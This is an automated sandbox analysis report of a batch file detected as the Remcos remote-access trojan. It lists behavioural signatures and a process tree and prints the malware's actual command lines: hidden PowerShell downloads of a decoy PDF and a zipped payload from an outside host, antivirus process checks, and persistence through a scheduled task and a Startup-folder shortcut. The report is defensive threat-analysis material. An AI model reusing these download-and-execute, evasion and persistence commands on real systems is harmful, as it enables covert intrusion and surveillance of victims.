Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9W9jJCj9EV.bat

Overview

General Information

Sample name:9W9jJCj9EV.bat
renamed because original name is a hash value
Original sample name:e8dfdb915a523a09e139aaa900991ddd.bat
Analysis ID:1584358
MD5:e8dfdb915a523a09e139aaa900991ddd
SHA1:d23f4798c549bfb7ddd968c4c2a971f67468a662
SHA256:91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e
Tags:batuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Drops large PE files
Found API chain indicative of sandbox detection
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 7572 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7664 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 7852 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 8120 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 2632 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1716,i,17469338737042705526,11542992222865520441,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • powershell.exe (PID: 7872 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 4020 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • msword.exe (PID: 6868 cmdline: msword.exe MD5: 6BCF42715FD1768FE1013C702612D0EE)
      • cmd.exe (PID: 1012 cmdline: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8060 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7916 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 988 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7000 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 1812 cmdline: cmd /c md 677826 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • findstr.exe (PID: 6272 cmdline: findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 3532 cmdline: cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Prostores.com (PID: 2700 cmdline: Prostores.com N MD5: 62D09F076E6E0240548C2F837536A46A)
          • cmd.exe (PID: 4908 cmdline: cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 3868 cmdline: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
          • cmd.exe (PID: 732 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & echo URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 3148 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • svchost.exe (PID: 5952 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 7180 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • CineBlend.scr (PID: 1056 cmdline: "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 7576 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • CineBlend.scr (PID: 7580 cmdline: "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s" MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4908, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, ProcessId: 3868, ProcessName: schtasks.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7572, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7872, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7572, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7872, ProcessName: powershell.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", ProcessId: 7180, ProcessName: wscript.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7572, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7664, ProcessName: powershell.exe
Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\677826\Prostores.com, ProcessId: 2700, TargetFilename: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: msword.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.exe, ParentProcessId: 6868, ParentProcessName: msword.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd, ProcessId: 1012, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4908, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, ProcessId: 3868, ProcessName: schtasks.exe
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\677826\Prostores.com, ProcessId: 2700, TargetFilename: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7572, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7664, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", ProcessId: 7180, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7572, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7664, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5952, ProcessName: svchost.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 732, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1012, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7000, ProcessName: findstr.exe

Stealing of Sensitive Information

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\677826\Prostores.com, ProcessId: 2700, TargetFilename: C:\ProgramData\remcos\logs.dat
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://myguyapp.com/msword.zipAvira URL Cloud: Label: malware
Source: 9W9jJCj9EV.batReversingLabs: Detection: 13%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.6% probability
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406301 FindFirstFileW,FindClose,15_2_00406301
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,15_2_00406CC7
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BBA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,33_2_00BBA087
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BBA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,33_2_00BBA1E2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BAE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,33_2_00BAE472
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BBA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,33_2_00BBA570
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BB66DC FindFirstFileW,FindNextFileW,FindClose,33_2_00BB66DC
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B7C622 FindFirstFileExW,33_2_00B7C622
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BB73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,33_2_00BB73D4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BB7333 FindFirstFileW,FindClose,33_2_00BB7333
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BAD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,33_2_00BAD921
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,33_2_00BADC54
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BBD889 InternetReadFile,SetEvent,GetLastError,SetEvent,33_2_00BBD889
Source: msword.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: msword.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: msword.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: msword.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: svchost.exe, 00000007.00000002.2574487359.000001AA08400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: msword.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: msword.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: msword.exe.14.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: msword.exe.14.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: msword.exe.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: msword.exe.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: msword.exe.14.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: msword.exe.14.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: svchost.exe, 00000007.00000003.1397678041.000001AA08650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: msword.exe, 0000000F.00000000.1716029840.0000000000409000.00000002.00000001.01000000.00000006.sdmp, msword.exe, 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmp, msword.exe.14.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msword.exe.14.drString found in binary or memory: http://ocsp.digicert.com0C
Source: msword.exe.14.drString found in binary or memory: http://ocsp.digicert.com0H
Source: msword.exe.14.drString found in binary or memory: http://ocsp.digicert.com0I
Source: msword.exe.14.drString found in binary or memory: http://ocsp.digicert.com0O
